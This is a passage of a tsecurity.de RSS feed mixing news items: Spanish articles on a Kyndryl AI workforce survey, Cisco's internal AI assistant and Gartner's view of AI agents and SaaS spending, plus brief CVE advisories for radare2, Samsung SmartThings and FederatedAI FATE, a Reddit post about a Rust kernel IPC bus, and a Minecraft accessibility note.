<li>El 33% espera que la cultura organizativa y las capacidades de gestión del cambio estén totalmente preparadas para la IA a finales de año.</li>
</ul>



<p>El informe, basado en una encuesta realizada a 1.100 líderes empresariales y tecnológicos de ocho países, sugiere que la preparación de la plantilla se está convirtiendo en un factor clave para el éxito, a medida que las organizaciones van más allá de la fase experimental de la IA y se centran en resultados empresariales cuantificables.</p>



<p>En su investigación, Kyndryl identifica un pequeño subconjunto de organizaciones —apenas el 9% de los encuestados— a las que denomina ‘pioneras’. Estas empresas invirtieron en la preparación de la plantilla al tiempo que rediseñaban los puestos de trabajo y los flujos de trabajo en torno a la IA. Tenían 1,5 veces más probabilidades de registrar un crecimiento de los ingresos impulsado por la IA y 1,6 veces más probabilidades de lograr resultados relacionados con la innovación que el resto de encuestados.</p>



<p>Casi el 80% de los encuestados señala que es probable que el ritmo de adopción de la IA supere la capacidad de su organización para adaptar su plantilla, sus estructuras de gobernanza y su modelo operativo. Tal y como apunta Kyndryl en el informe, la mayoría de los líderes cree que abordar esos retos “resultará más arduo que los relacionados con el código y la informática”.</p>



<p>Las organizaciones también tienen dificultades para alcanzar los resultados que más desean obtener de la IA. La mejora de la eficiencia operativa y la productividad sigue siendo la principal prioridad de las empresas en materia de IA, citada por el 34% de los encuestados, seguida de la modernización de las TI (27%), la gestión de riesgos y las mejoras en materia de seguridad (25%), la innovación empresarial (25 %) y el crecimiento de los ingresos impulsado por la IA (24%).</p>



<p>Sin embargo, solo el 32% de las organizaciones dice haber logrado siquiera uno de sus dos principales resultados deseados, y apenas el 11% declara haberlos logrado ambos. La mejora de la eficiencia operativa y la productividad fue el resultado de la IA más mencionado, citado por el 38% de los encuestados. En comparación, las organizaciones se muestran mucho menos propensas a mencionar resultados como el crecimiento de los ingresos impulsado por la IA (14%), la modernización de las TI (13%) o la innovación en nuevos productos y servicios (11%).</p>



<p>Muchas organizaciones atribuyen esos retos a problemas relacionados con la plantilla y las competencias. Casi la mitad de los encuestados (49%) identifica las carencias de competencias y talento como un obstáculo importante para la ejecución de sus estrategias de IA, solo superado por las preocupaciones en materia de ciberseguridad (52%). Además, el 52% afirma que, durante el último año, se ha vuelto más difícil encontrar empleados con las competencias necesarias para respaldar la estrategia de IA de su organización.</p>



<p>El informe de Kyndryl revela que el 94% de los encuestados cree que la IA hará que la mejora de las competencias de los empleados actuales resulte más eficaz que la contratación de talento externo.</p>



<p>“La capacidad de la IA para transformar el trabajo está obligando a las organizaciones a reestructurar su plantilla más rápidamente que nunca”, afirma Mark Paulek, director de Recursos Humanos de Kyndryl, en un <a href="https://www.kyndryl.com/us/en/about-us/news/2026/06/ai-adoption-workforce-readiness" target="_blank" rel="nofollow">comunicado</a>. “Los líderes que van por delante están adaptando las competencias, las funciones y la toma de decisiones a la forma en que el trabajo está cambiando realmente”.</p>



<p></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-14759 | radareorg radare2 up to 6.1.6 RBinJava Line Number Table Parser shlr/java/class.c r_bin_java_inner_classes_attr_calc_size heap-based overflow (Issue 26043 / EUVD-2026-41769)]]></title>
<description><![CDATA[A vulnerability classified as problematic has been found in radareorg radare2 up to 6.1.6. This issue affects the function r_bin_java_inner_classes_attr_calc_size of the file shlr/java/class.c of the component RBinJava Line Number Table Parser. Performing a manipulation results in heap-based buff...]]></description>
<link>https://tsecurity.de/de/3647189/sicherheitsluecken/cve-2026-14759-radareorg-radare2-up-to-616-rbinjava-line-number-table-parser-shlrjavaclassc-rbinjavainnerclassesattrcalcsize-heap-based-overflow-issue-26043-euvd-2026-41769/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3647189/sicherheitsluecken/cve-2026-14759-radareorg-radare2-up-to-616-rbinjava-line-number-table-parser-shlrjavaclassc-rbinjavainnerclassesattrcalcsize-heap-based-overflow-issue-26043-euvd-2026-41769/</guid>
<pubDate>Sun, 05 Jul 2026 21:25:00 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability classified as <a href="https://vuldb.com/kb/risk">problematic</a> has been found in <a href="https://vuldb.com/product/radareorg:radare2">radareorg radare2 up to 6.1.6</a>. This issue affects the function <code>r_bin_java_inner_classes_attr_calc_size</code> of the file <em>shlr/java/class.c</em> of the component <em>RBinJava Line Number Table Parser</em>. Performing a manipulation results in heap-based buffer overflow.

This vulnerability is reported as <a href="https://vuldb.com/cve/CVE-2026-14759">CVE-2026-14759</a>. The attack requires a local approach. Moreover, an exploit is present.

To fix this issue, it is recommended to deploy a patch.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2022-39867 | Samsung SmartThings up to 1.7.73.22 cloudNotificationManager.java access control (EUVD-2022-42312)]]></title>
<description><![CDATA[A vulnerability has been found in Samsung SmartThings up to 1.7.73.22 and classified as critical. Affected is an unknown function of the file cloudNotificationManager.java. Performing a manipulation results in improper access controls.

This vulnerability is reported as CVE-2022-39867. The attack...]]></description>
<link>https://tsecurity.de/de/3646490/sicherheitsluecken/cve-2022-39867-samsung-smartthings-up-to-177322-cloudnotificationmanagerjava-access-control-euvd-2022-42312/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3646490/sicherheitsluecken/cve-2022-39867-samsung-smartthings-up-to-177322-cloudnotificationmanagerjava-access-control-euvd-2022-42312/</guid>
<pubDate>Sun, 05 Jul 2026 11:24:21 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability has been found in <a href="https://vuldb.com/product/samsung:smartthings">Samsung SmartThings up to 1.7.73.22</a> and classified as <a href="https://vuldb.com/kb/risk">critical</a>. Affected is an unknown function of the file <em>cloudNotificationManager.java</em>. Performing a manipulation results in improper access controls.

This vulnerability is reported as <a href="https://vuldb.com/cve/CVE-2022-39867">CVE-2022-39867</a>. The attack requires a local approach. No exploit exists.

The affected component should be upgraded.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2022-39869 | Samsung SmartThings up to 1.7.73.22 cloudNotificationManager.java access control (EUVD-2022-42314)]]></title>
<description><![CDATA[A vulnerability was found in Samsung SmartThings up to 1.7.73.22. It has been classified as critical. Affected by this issue is some unknown functionality of the file cloudNotificationManager.java. The manipulation leads to improper access controls.

This vulnerability is traded as CVE-2022-39869...]]></description>
<link>https://tsecurity.de/de/3646488/sicherheitsluecken/cve-2022-39869-samsung-smartthings-up-to-177322-cloudnotificationmanagerjava-access-control-euvd-2022-42314/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3646488/sicherheitsluecken/cve-2022-39869-samsung-smartthings-up-to-177322-cloudnotificationmanagerjava-access-control-euvd-2022-42314/</guid>
<pubDate>Sun, 05 Jul 2026 11:24:18 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/product/samsung:smartthings">Samsung SmartThings up to 1.7.73.22</a>. It has been classified as <a href="https://vuldb.com/kb/risk">critical</a>. Affected by this issue is some unknown functionality of the file <em>cloudNotificationManager.java</em>. The manipulation leads to improper access controls.

This vulnerability is traded as <a href="https://vuldb.com/cve/CVE-2022-39869">CVE-2022-39869</a>. An attack has to be approached locally. There is no exploit available.

Upgrading the affected component is recommended.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2022-39870 | Samsung SmartThings up to 1.7.73.22 cloudNotificationManager.java access control (EUVD-2022-42315)]]></title>
<description><![CDATA[A vulnerability was found in Samsung SmartThings up to 1.7.73.22. It has been declared as critical. This affects an unknown part of the file cloudNotificationManager.java. The manipulation results in improper access controls.

This vulnerability is known as CVE-2022-39870. Attacking locally is a ...]]></description>
<link>https://tsecurity.de/de/3646487/sicherheitsluecken/cve-2022-39870-samsung-smartthings-up-to-177322-cloudnotificationmanagerjava-access-control-euvd-2022-42315/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3646487/sicherheitsluecken/cve-2022-39870-samsung-smartthings-up-to-177322-cloudnotificationmanagerjava-access-control-euvd-2022-42315/</guid>
<pubDate>Sun, 05 Jul 2026 11:24:17 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/product/samsung:smartthings">Samsung SmartThings up to 1.7.73.22</a>. It has been declared as <a href="https://vuldb.com/kb/risk">critical</a>. This affects an unknown part of the file <em>cloudNotificationManager.java</em>. The manipulation results in improper access controls.

This vulnerability is known as <a href="https://vuldb.com/cve/CVE-2022-39870">CVE-2022-39870</a>. Attacking locally is a requirement. No exploit is available.

It is recommended to upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2022-39871 | Samsung SmartThings up to 1.7.73.22 cloudNotificationManager.java access control (EUVD-2022-42316)]]></title>
<description><![CDATA[A vulnerability was found in Samsung SmartThings up to 1.7.73.22. It has been rated as critical. This vulnerability affects unknown code of the file cloudNotificationManager.java. This manipulation causes improper access controls.

This vulnerability is handled as CVE-2022-39871. It is possible t...]]></description>
<link>https://tsecurity.de/de/3646486/sicherheitsluecken/cve-2022-39871-samsung-smartthings-up-to-177322-cloudnotificationmanagerjava-access-control-euvd-2022-42316/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3646486/sicherheitsluecken/cve-2022-39871-samsung-smartthings-up-to-177322-cloudnotificationmanagerjava-access-control-euvd-2022-42316/</guid>
<pubDate>Sun, 05 Jul 2026 11:24:16 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/product/samsung:smartthings">Samsung SmartThings up to 1.7.73.22</a>. It has been rated as <a href="https://vuldb.com/kb/risk">critical</a>. This vulnerability affects unknown code of the file <em>cloudNotificationManager.java</em>. This manipulation causes improper access controls.

This vulnerability is handled as <a href="https://vuldb.com/cve/CVE-2022-39871">CVE-2022-39871</a>. It is possible to launch the attack on the local host. There is not any exploit available.

Upgrading the affected component is advised.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2022-39865 | Samsung SmartThings up to 1.7.73.22 ContentsSharingActivity.java access control (EUVD-2022-42310)]]></title>
<description><![CDATA[A vulnerability, which was classified as critical, has been found in Samsung SmartThings up to 1.7.73.22. This affects an unknown function of the file ContentsSharingActivity.java. This manipulation causes improper access controls.

This vulnerability is registered as CVE-2022-39865. The attack n...]]></description>
<link>https://tsecurity.de/de/3645739/sicherheitsluecken/cve-2022-39865-samsung-smartthings-up-to-177322-contentssharingactivityjava-access-control-euvd-2022-42310/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3645739/sicherheitsluecken/cve-2022-39865-samsung-smartthings-up-to-177322-contentssharingactivityjava-access-control-euvd-2022-42310/</guid>
<pubDate>Sat, 04 Jul 2026 20:37:47 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability, which was classified as <a href="https://vuldb.com/kb/risk">critical</a>, has been found in <a href="https://vuldb.com/product/samsung:smartthings">Samsung SmartThings up to 1.7.73.22</a>. This affects an unknown function of the file <em>ContentsSharingActivity.java</em>. This manipulation causes improper access controls.

This vulnerability is registered as <a href="https://vuldb.com/cve/CVE-2022-39865">CVE-2022-39865</a>. The attack needs to be launched locally. No exploit is available.

It is advisable to upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-14621 | FederatedAI FATE up to 2.2.0 OSX Broker QueuePushReqStreamObserver.java QueuePushReqStreamObserver.initEggroll rollSiteSessionId/dstRole/dstPartyId wrong session (Issue 5791 / EUVD-2026-41660)]]></title>
<description><![CDATA[A vulnerability described as problematic has been identified in FederatedAI FATE up to 2.2.0. This affects the function QueuePushReqStreamObserver.initEggroll of the file java/osx/osx-broker/src/main/java/org/fedai/osx/broker/grpc/QueuePushReqStreamObserver.java of the component OSX Broker. Such ...]]></description>
<link>https://tsecurity.de/de/3645295/sicherheitsluecken/cve-2026-14621-federatedai-fate-up-to-220-osx-broker-queuepushreqstreamobserverjava-queuepushreqstreamobserveriniteggroll-rollsitesessioniddstroledstpartyid-wrong-session-issue-5791-euvd-2026-41660/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3645295/sicherheitsluecken/cve-2026-14621-federatedai-fate-up-to-220-osx-broker-queuepushreqstreamobserverjava-queuepushreqstreamobserveriniteggroll-rollsitesessioniddstroledstpartyid-wrong-session-issue-5791-euvd-2026-41660/</guid>
<pubDate>Sat, 04 Jul 2026 13:54:34 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability described as <a href="https://vuldb.com/kb/risk">problematic</a> has been identified in <a href="https://vuldb.com/product/federatedai:fate">FederatedAI FATE up to 2.2.0</a>. This affects the function <code>QueuePushReqStreamObserver.initEggroll</code> of the file <em>java/osx/osx-broker/src/main/java/org/fedai/osx/broker/grpc/QueuePushReqStreamObserver.java</em> of the component <em>OSX Broker</em>. Such manipulation of the argument <em>rollSiteSessionId/dstRole/dstPartyId</em> leads to exposure of data element to wrong session.

This vulnerability is documented as <a href="https://vuldb.com/cve/CVE-2026-14621">CVE-2026-14621</a>. The attack can be executed remotely. Additionally, an exploit exists.

The pull request to fix this issue awaits acceptance.]]></content:encoded>
</item>
<item>
<title><![CDATA[I tried to create a better IPC system for Linux (rust btw)]]></title>
<description><![CDATA[I'm creating a project called motherboard, a kernel-backed service bus for Linux, designed for fast communication between applications and system services. The idea came from a frustration I have with Linux application development: the system has very powerful primitives, but it doesn't have an a...]]></description>
<link>https://tsecurity.de/de/3644647/linux-tipps/i-tried-to-create-a-better-ipc-system-for-linux-rust-btw/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3644647/linux-tipps/i-tried-to-create-a-better-ipc-system-for-linux-rust-btw/</guid>
<pubDate>Sat, 04 Jul 2026 04:09:13 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>I'm creating a project called <code>motherboard</code>, a kernel-backed service bus for Linux, designed for fast communication between applications and system services.</p> <p>The idea came from a frustration I have with Linux application development: the system has very powerful primitives, but it doesn't have an application platform as unified as Windows or Android. To build a complete app, we often need to deal with a mix of sockets, D-Bus, portals, specific daemons, X11/Wayland, PulseAudio/PipeWire, systemd or alternatives, etc.</p> <p><code>motherboard</code> tries to address this problem by creating a common layer where applications talk to stable OS global interfaces, not concrete processes.</p> <p>For example, an app should not need to know which daemon implements notifications. It should call something like:</p> <pre><code> NotificationDispatcher.send(...) </code></pre> <p>and the system should route that to whoever currently implements that service.</p> <p>Today that implementation may live in a monolithic process. Tomorrow it may be split into multiple daemons. The application does not change, because it depends on the interface, not the implementation.</p> <p>It may look like overengineering if you think about an isolated app talking to one specific daemon. But the problem here is different: an operating system needs to expose global APIs to many applications that do not know each other, while maintaining shared state, permissions, notifications, and real-time changes and you need the OS to be easily backwards compatible.</p> <p>If the user changes the theme or the network state changes (like wifi strength, status, IP, etc...), the shell needs to update, open apps need to react, services may need to recompute state, and future applications I have never seen before need a stable way to observe that without knowing which processes implement each of those services.</p> <p>That is why motherboard is not just “another IPC”. It tries to turn system services into stable interfaces with function calls, reactive stores, and eventually signals. For a small app, Unix sockets are enough. For an OS platform, you need a common layer.</p> <h1>What already works</h1> <p>The project already has a Linux kernel module called <code>motherboardm</code>, which exposes <code>/dev/services</code>.</p> <p>Communication uses commands serialized with <code>postcard</code> and sent through <code>ioctl</code>.</p> <p>Currently, I have implemented:</p> <ul> <li>asynchronous RPC-style calls;</li> <li>per-connection inboxes;</li> <li>latch file descriptors compatible with <code>poll</code>/<code>epoll</code>;</li> <li>inline file descriptor passing;</li> <li>identity metadata provided by the kernel, such as PID, UID, GID, and a flag indicating whether the identity comes from the initial namespace;</li> <li>reactive stores.</li> </ul> <p>Stores are one of my favorite parts of the design. Stores are very similar in spirit to <a href="https://svelte.dev/docs/svelte/stores#svelte-store-readable">svelte readable stores</a>. A service can expose a retained value, for example:</p> <pre><code> SettingsManager.theme </code></pre> <p>Clients can subscribe to that store, receive the current value, and then receive updates whenever the service changes the value.</p> <p>Signals are not implemented yet, but the idea is to use them for events such as “the user clicked on a notification” so apps can do things when certain things happen in the OS.</p> <h1>Practical example</h1> <p>I made a proof of concept with a settings app.</p> <p>One app calls a setter function in the settings service to change the theme. The service updates the <code>theme</code> store, and the other apps that were subscribed receive the update automatically.</p> <p>In other words, system state becomes a reactive primitive instead of polling and flooding the server with get requests like it usually happens with DBus.</p> <h1>Why in the kernel?</h1> <p>I know the natural reaction is to ask: “why not D-Bus or Unix sockets?”</p> <p>The short answer is that Unix sockets are good, but they are a generic primitive. Each protocol needs to rebuild framing, request IDs, asynchronous wakeups, credentials, fd passing, and its own conventions.</p> <p><code>motherboard</code> moves those concerns into a common layer:</p> <ul> <li>atomic messages instead of byte streams;</li> <li>asynchronous request/reply;</li> <li>reply tokens issued by the kernel;</li> <li>fd passing together with the payload;</li> <li>caller identity provided by the kernel;</li> <li>integration with <code>poll</code>/<code>epoll</code>;</li> <li>services as namespaces for functions, stores, and eventually signals.</li> </ul> <p>The inspiration comes a lot from Android Binder, where many Java APIs actually call privileged system services underneath.</p> <h1>Current status</h1> <p>This is still an early prototype. It is kernel code, so bugs can crash the machine. For now, I am developing and testing it carefully.</p> <p>I also created a tool called <code>cargo-nok</code> to compile Linux kernel modules in Rust using Cargo, without directly depending on the kernel’s traditional Makefile infrastructure, allowing direct use of crates.io libraries, taking advantage of the Rust ecosystem and greatly speeding up development. Repository: <a href="https://github.com/ardos-os/cargo-nok">https://github.com/ardos-os/cargo-nok</a></p> <p>My goal now is to get feedback on the design:</p> <ul> <li>does it make sense to model services as namespaces for functions, stores, and signals?</li> <li>do reactive stores at the service bus level seem like a good primitive?</li> <li>what security or lifecycle problems do you think I should handle early?</li> <li>should this stay in the kernel, or would some parts make more sense in userspace?</li> </ul> <p>GitHub: <a href="https://github.com/ardos-os/motherboard">https://github.com/ardos-os/motherboard</a></p> <p>I would really like to hear opinions, especially from people who have worked with Linux, IPC, operating systems, D-Bus, Android, Rust, or low-level development.</p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/tiagodinis_"> /u/tiagodinis_ </a> <br> <span><a href="https://www.reddit.com/r/linux/comments/1umv6g2/i_tried_to_create_a_better_ipc_system_for_linux/">[link]</a></span>   <span><a href="https://www.reddit.com/r/linux/comments/1umv6g2/i_tried_to_create_a_better_ipc_system_for_linux/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[Minecraft Bedrock just got a huge accessibility upgrade with closed captions: Here's everything you need to know]]></title>
<description><![CDATA[Minecraft Bedrock Edition has finally received closed captions, bringing a long-requested accessibility feature previously exclusive to Java Edition. Here's how to enable it, how it works, and why it's an important step forward for accessibility.]]></description>
<link>https://tsecurity.de/de/3644020/windows-tipps/minecraft-bedrock-just-got-a-huge-accessibility-upgrade-with-closed-captions-heres-everything-you-need-to-know/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3644020/windows-tipps/minecraft-bedrock-just-got-a-huge-accessibility-upgrade-with-closed-captions-heres-everything-you-need-to-know/</guid>
<pubDate>Fri, 03 Jul 2026 18:32:04 +0200</pubDate>
<category>🪟 Windows Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Minecraft Bedrock Edition has finally received closed captions, bringing a long-requested accessibility feature previously exclusive to Java Edition. Here's how to enable it, how it works, and why it's an important step forward for accessibility.]]></content:encoded>
</item>
<item>
<title><![CDATA[Cisco tiene un asistente de IA interno… y sirve para todo]]></title>
<description><![CDATA[Desde la irrupción de ChatGPT, las empresas han intentado transformar el potencial de la IA generativa como asistente digital en mejoras de productividad para todas las áreas de la organización. Cisco es una de las compañías que se ha situado a la vanguardia de este esfuerzo.



La idea original ...]]></description>
<link>https://tsecurity.de/de/3643363/it-nachrichten/cisco-tiene-un-asistente-de-ia-interno-y-sirve-para-todo/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3643363/it-nachrichten/cisco-tiene-un-asistente-de-ia-interno-y-sirve-para-todo/</guid>
<pubDate>Fri, 03 Jul 2026 13:18:33 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Desde la irrupción de <a href="https://www.computerworld.es/article/4028094/por-que-chatgpt-esta-arrasando-a-microsoft-copilot.html">ChatGPT</a>, las empresas han intentado transformar el potencial de la IA generativa como asistente digital en mejoras de productividad para todas las áreas de la organización. Cisco es una de las compañías que se ha situado a la vanguardia de este esfuerzo.</p>



<p>La idea original de crear un asistente interno surgió en Cisco cuando ChatGPT y otras herramientas de IA orientadas al consumidor aparecieron a finales de 2022 y principios de 2023, y la dirección de la compañía debatía si debía permitir a los empleados utilizarlas, explica Srini Namineni, director de Automatización de Cisco. “La gran pregunta era: ¿deberíamos bloquearlo?”, recuerda. “Los riesgos estaban claros cuando las personas podían introducir datos de la empresa y estos podían quedar expuestos a terceros. Tomamos una decisión deliberada: en lugar de bloquear estas herramientas, ofreceríamos una alternativa segura”.</p>



<p>Ese proyecto inicial de asistente interno de IA, lanzado a finales de 2023, también se concibió para consolidar en una única plataforma lo que podría haberse convertido en un ecosistema fragmentado de herramientas de IA, al tiempo que permitía a los empleados conectarse a múltiples modelos.</p>



<p>El asistente de IA, que originalmente integraba Azure OpenAI y Google Gemini, puede incorporar nuevos modelos en apenas un par de semanas desde que un empleado lo solicita, afirma Namineni. Desde entonces, ha evolucionado hasta convertirse en una herramienta multifuncional que combina capacidades de copiloto, asistente de programación, asistente de recursos humanos y apoyo para múltiples tareas, permitiendo a los empleados aplicar IA a una amplia variedad de actividades laborales.</p>



<p>Según la compañía, este asistente, que le ha valido a Cisco un <a href="https://www.cio.com/article/220017/us-cio-100-winners-celebrating-it-innovation-and-leadership.html" target="_blank">Premio CIO 100 2026 a la innovación y el liderazgo en TI</a>, permite a sus ingenieros ahorrar una media de seis horas semanales y al resto de empleados unas cinco horas por semana.</p>



<p>Aunque los objetivos principales del proyecto eran la seguridad y la flexibilidad, Cisco ha descubierto una tercera ventaja: con un coste mensual por usuario de unos 10 dólares, el asistente interno resulta más económico que varias soluciones de IA comerciales disponibles en el mercado, señala Namineni.</p>



<h2 class="wp-block-heading">Mitigar los riesgos de la IA</h2>



<p>La herramienta, disponible para los empleados desde 2024, contaba con más de 96.000 usuarios en el primer trimestre de 2026 y una tasa de adopción del 90%. Según encuestas internas, el 79% de los empleados considera que el asistente les ahorra tiempo, el 72% afirma que aumenta su productividad y el 71% destaca que mejora la calidad de su trabajo.</p>



<p>Por ejemplo, Cisco asegura que la herramienta ha acelerado el desarrollo de software al ayudar a los programadores a detectar pequeños errores y generar pruebas unitarias.</p>



<p>Namineni y su equipo han impulsado la adopción del asistente mediante la incorporación continua de nuevas funciones, dotándolo de más capacidades que algunas soluciones comerciales.</p>



<p>Los empleados pueden compartir entre sí instrucciones o prompts de IA a través de la plataforma y gestionar tareas de recursos humanos, como solicitar vacaciones, sin necesidad de acceder a otros servicios. El asistente también permite cargar conjuntos de datos propietarios en carpetas seguras de OneDrive para proyectos personalizados e incorpora capacidades de RAG (Retrieval Augmented Generation) como servicio, lo que facilita consultas seguras sobre documentos y metadatos internos de Cisco.</p>



<p>El proyecto se basa en una arquitectura de microservicios que permite integrar rápidamente nuevas aplicaciones de IA. Cisco presenta el asistente como un compañero de trabajo digital y visualiza un futuro en el que cada empleado disponga de un equipo virtual de agentes de IA.</p>



<h2 class="wp-block-heading">La próxima evolución</h2>



<p>Namineni prevé incorporar nuevas funcionalidades, entre ellas agentes personalizados que asistan de forma permanente a cada empleado.</p>



<p>Estos agentes podrían conectarse al correo electrónico y a las cuentas de Webex Meetings de los usuarios y realizar acciones en su nombre, siempre con autorización. Por ejemplo, podrían clasificar automáticamente los correos electrónicos según su prioridad.</p>



<p>También considera que estos asistentes asumirán más tareas de recursos humanos y finanzas, permitiendo que los empleados se concentren en actividades de mayor valor.</p>



<p>Sin embargo, los usuarios mantendrán el control, subraya. “No estoy preparado para renunciar al 100% del control salvo en actividades de bajo valor, donde podría aceptar algún error, porque la IA se equivoca”, afirma Namineni. “Nuestro reto es cómo aprovechar esta capacidad, limitarla a los casos de uso donde pueda realizar la mayor cantidad de trabajo posible y, al mismo tiempo, mantener siempre a las personas supervisando el proceso”.</p>



<p>Además del premio CIO 100, el proyecto ha recibido otros reconocimientos. Según Amy Loomis, vicepresidenta de soluciones para el puesto de trabajo de la consultora IDC, el asistente puede servir de modelo para otras grandes empresas que quieran fomentar un uso seguro de la IA entre sus empleados.</p>



<h2 class="wp-block-heading">Seguir la lógica</h2>



<p>Loomis afirma que otras organizaciones pueden adoptar la lógica del enfoque, aunque no necesariamente replicar la misma infraestructura tecnológica de Cisco. La arquitectura utilizada —que incluye integración de múltiples modelos, orquestación híbrida <em>multicloud</em>, RAG como servicio y microservicios— responde a la escala y capacidad de ingeniería de Cisco.</p>



<p>Sin embargo, las decisiones de fondo son acertadas, sostiene. Las compañías deberían proporcionar a sus empleados un entorno interno y gobernado para utilizar IA antes de que prolifere el uso de herramientas no autorizadas; evitar la fragmentación mediante una interfaz inteligente unificada; implantar controles de acceso que mantengan la responsabilidad humana sobre las acciones de la IA; y presentar la IA como una herramienta que amplía el alcance y la calidad del trabajo de los empleados.</p>



<p>La innovación de Cisco reside en la forma en que todos los componentes trabajan conjuntamente como un sistema, explica Loomis. Elementos como los flujos RAG, el acceso a GPT-4o, la integración con OneDrive o las arquitecturas de microservicios están disponibles en otros entornos, pero Cisco ha logrado combinarlos en una única plataforma. “Lo menos habitual es reunir todo esto dentro de un entorno gobernado por la propia empresa, con controles explícitos sobre los datos, en lugar de enviar las consultas de los empleados a servicios externos de IA donde la información sensible puede acabar formando parte de conjuntos de entrenamiento públicos”, añade.</p>



<p>Loomis destaca especialmente la función My Projects, que permite a los empleados cargar conjuntos de datos propietarios en carpetas seguras de OneDrive para realizar consultas y respuestas personalizadas.</p>



<p>Según explica, este enfoque proporciona a los trabajadores las capacidades que necesitan y evita que recurran a herramientas externas no autorizadas. La analista también elogia la estrategia de Cisco de presentar la IA como una capa de ampliación de las capacidades humanas. “Dar a cada empleado acceso a un conjunto de herramientas de IA adaptadas a su puesto y contexto de trabajo es tanto una decisión de gestión del cambio como una decisión tecnológica”, relata. “Las organizaciones que presentan la IA de esta manera, como una herramienta que potencia lo que los empleados pueden hacer en lugar de sustituir la forma en que trabajan, suelen lograr una adopción más amplia porque reducen la resistencia que habitualmente ralentiza su despliegue”.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Los agentes de IA ponen en riesgo 234.000 millones de dólares del gasto empresarial en SaaS, según Gartner]]></title>
<description><![CDATA[“Ya no se compra software principalmente para personas; cada vez se compra más para agentes”, explica George Brocklehurst, vicepresidente ejecutivo de Gartner. “Durante un par de décadas, el software se ha evaluado por su interfaz y por la experiencia de usuario: facilidad de uso, flujos de traba...]]></description>
<link>https://tsecurity.de/de/3642941/it-nachrichten/los-agentes-de-ia-ponen-en-riesgo-234000-millones-de-dlares-del-gasto-empresarial-en-saas-segn-gartner/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3642941/it-nachrichten/los-agentes-de-ia-ponen-en-riesgo-234000-millones-de-dlares-del-gasto-empresarial-en-saas-segn-gartner/</guid>
<pubDate>Fri, 03 Jul 2026 09:48:14 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>“Ya no se compra software principalmente para personas; cada vez se compra más para agentes”, explica George Brocklehurst, vicepresidente ejecutivo de Gartner. “Durante un par de décadas, el <a href="https://www.computerworld.es/article/4188279/especial-desarrollo-de-software-2026.html">software </a>se ha evaluado por su interfaz y por la experiencia de usuario: facilidad de uso, flujos de trabajo, formación. Cuando los agentes de IA se convierten en el usuario principal, todo eso pierde valor”.</p>



<p>Gartner estima que el gasto expuesto representará alrededor del 20% del gasto empresarial en SaaS al final de la década. La consultora atribuye este cambio al fenómeno que denomina ‘arbitraje agentivo’ (<em>agentic arbitrage</em>), es decir, el uso de agentes de IA para completar tareas empresariales a través de múltiples sistemas corporativos, reduciendo la necesidad de que los empleados interactúen directamente con cada aplicación.</p>



<p>Según Brocklehurst, la IA agentiva está cambiando la economía del software. Estos sistemas suelen omitir los flujos tradicionales de uso del software y entregar directamente los resultados, rompiendo así la relación histórica entre el crecimiento del número de usuarios y el crecimiento de los ingresos de muchos proveedores de software empresarial.</p>



<h2 class="wp-block-heading">Los CIO deberán replantearse la adquisición de software</h2>



<p>La aparición de la IA agentiva obligará a los CIO a evaluar el software empresarial de otra manera. En lugar de centrarse principalmente en la experiencia de usuario y el diseño de las interfaces, las organizaciones deberán analizar si los agentes de IA pueden realizar, mediante API, todas las funciones que hoy ejecutan los usuarios humanos a través de pantallas y aplicaciones.</p>



